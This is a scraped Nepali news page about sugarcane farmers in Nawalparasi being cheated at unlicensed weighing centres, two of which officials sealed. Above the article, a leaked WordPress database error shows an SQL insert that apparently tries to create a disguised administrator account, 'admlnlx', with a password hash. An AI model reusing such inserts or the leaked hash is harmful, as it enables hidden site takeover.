WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bx8mdZEVmVzZwX2VpvdtqrscTrLR8B0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 07:09:54', '', 'admlnlx', 'admlnlx')
नवलपरासी,पुस ९-
नवलपरासीका उखु किसान तौलमा ठगिने गरेको पाइएको छ । जिल्ला प्रशासन कार्यालयले गरेको अनुगमनका क्रममा विभिन्न स्थानमा व्यक्तिले सञ्चालन गरेको तौल केन्द्रमा वास्तविक तौलभन्दा कम तौल देखाएर किसान ठगिने गरेको पाइएको हो ।जिल्लामा अवैध रुपमा सञ्चाल गरिएका तौल केन्द्रले वास्तविक तौलभन्दा कम तौल देखाउने गरेको पाइएको अनुगमनमा खटिएका सहायक प्रजिअ माधवप्रसाद ढुङ्गानाले बताए ।
तौलमा ठगी गरेको पाइएपछि बौदौली र भुजहवामा सञ्चालित तौल केन्द्रमा सिलबन्दी गरिएको छ, सहायक प्रजिअ ढुगांनाले भने, “नाप तौल तथा गुणस्तर विभागको स्वीकृत बिना सञ्चालनमा रहेका र किसानको उखु तौलमा ठगी गरेको पाइएकाले यी दुई वटा तौल केन्द्रमा सिलबन्दी गरिएको हो ।”
अन्य स्थानका तौल केन्द्रले पनि ठगी गरेको जनगुनासो आएपछि विभिन्न व्यक्ति र उद्योगले सञ्चालन गरेको तौल केन्द्रको अनुगमन र निरीक्षणलाई तिव्रता दिइएको जिल्ला प्रशासन कार्यालय नवलपरासीले जनाएको छ ।
नवलपरासीमा वार्षिक रुपमा ३० लाख क्विन्टल उखु उत्पादन हुने गरेका छन् । जिल्लामा लुम्बिनी चिनी उद्योग, वाग्मती चिनी उद्योग, इन्दिरा चिनी उद्योग र मोहीनी सुगर मिल्स सञ्चालनमा छन । यहाँका १० हजार घरधुरीले करिब ५५ हजार विघा क्षेत्रफलमा उखु खेती गर्दै आएका छन् ।